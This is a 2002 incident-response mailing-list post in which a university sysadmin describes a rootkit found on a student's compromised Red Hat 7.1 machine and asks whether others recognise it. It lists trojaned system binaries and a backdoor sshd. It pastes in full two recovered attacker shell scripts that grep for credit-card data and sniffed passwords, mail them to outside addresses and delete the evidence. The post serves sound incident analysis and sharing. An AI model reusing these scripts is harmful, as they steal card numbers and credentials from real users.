qestions about a rooted RH7.1 box

From: Christopher Albert (sysadmin@DMS.UMontreal.CA)
Date: 04/12/02 

Date: Fri, 12 Apr 2002 17:02:52 -0400
From: Christopher Albert <sysadmin@DMS.UMontreal.CA>
To: incidents@securityfocus.com

Greetings,
One of the students here got his home box rooted last week. Before he
reinstalled I asked him
to let me have a look at his box, which I could only do remotely. I took
a look at it yesterday for about
twenty minutes and collected some stuff, but I had him pull it offline
before grave-robber and I were finished because the box seemed just too
poisoned and I wasn't comfortable staying connected. I have some
questioned about what I found, and was wondering if the tools I found
were from a familiar rootkit.

1. Most of the attack tools were in

/usr/lib/.lib : libdi libdu libfh libne libnh libvd
libdi = libvd # The 'ls' trojan
libdu = # The 'top' trojan
libne = # The 'netstat' trojan

The 'ps' trojan was in : /usr/lib/libc/libp
 
/usr/lib/sn : * .sys .X
/usr/lib/ld : * chat .cv .X
       
.X= # Sorts the output from LinSniffer 0.03 [BETA] by Mike Edulla
<medulla@infosoc.com>
and .sys was its output file.

'chat' seemed to be 'chattr' which was removed from the system.

.cv was the output of a script in /usr/man/.../ looking for credit card
numbers
/usr/man/.../: .c .m # I'll paste these scripts at the end, since they
are revealing.

In addition, /usr/bin/kernel seemed to be a trojan sshd , running on
ports 6010, 6011.

The scipts .c and .m are :
/usr/man/...
.c
#!/bin/bash
hh="r0ot@emoka.ro"
egrep -ir 'mastercard|visa' /home|egrep -v cache >> /usr/lib/ld/.cv
egrep -ir 'mastercard|visa' /var|egrep -v cache >> /usr/lib/ld/.cv
egrep -ir 'mastercard|visa' /root|egrep -v cache >> /usr/lib/ld/.cv
if [ -d "/www" ]; then
egrep -ir 'mastercard|visa' /www >> /usr/lib/ld/.cv
fi
if [ -d "/var/www" ]; then
egrep -ir 'mastercard|visa' /var/www >> /usr/lib/ld/.cv
fi
if [ -f "/usr/lib/ld/.cv" ]; then
/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v
"127.0.0." | grep -v "192.168.0." >> /usr/lib/ld/.cv
hostname -f >> /usr/lib/ld/.cv
cat /usr/lib/ld/.cv | mail -s "cronmonthly" $hh
rm &> /dev/null -rf /usr/lib/ld/.cv
fi
rm &> /dev/null -rf /usr/man/.../.c
#!/bin/bash
#/usr/man/.../.m
#
cs="blackeyero@yahoo.com"
dp="/usr/lib/ld"
db="/usr/share/rht/..."
wd="/usr/man/.../.w
ml="/usr/man/.../.m
if [ -f "$dp/.i" ]; then
cat $dp/.i >> $dp/.pw
fi
if [ -f "$bla2/.o" ]; then
cat $dp/.o >> $dp/.pw
fi
/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v
"127.0.0." | grep -v "192.168.0." >> $dp/.d
hostname -f >> $dp/.d
cat $dp/.pw >> $dp/.d
if [ -f "/etc/hosts" ]; then
cat /etc/hosts >> $dp/.d
fi
cat $dp/.d | mail -s "cronstate" $cs
cat $dp/.pw >> $db/.p
rm &> /dev/null -rf $dp/.pw $dp/.d $wd $ml

Thought this might be of interest to the group.

Chris 

-- 
--------------------------------------------------------------------
                     Christopher Albert            
            Responsable des services informatiques
         Departement de mathematiques et de statistique
                  Universite de Montreal                       

           bureau 6188, Pavillon Andre-Aisenstadt
          Tel: (514) 343-2281  Fax: (514) 343-5700  
--------------------------------------------------------------------
									      

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com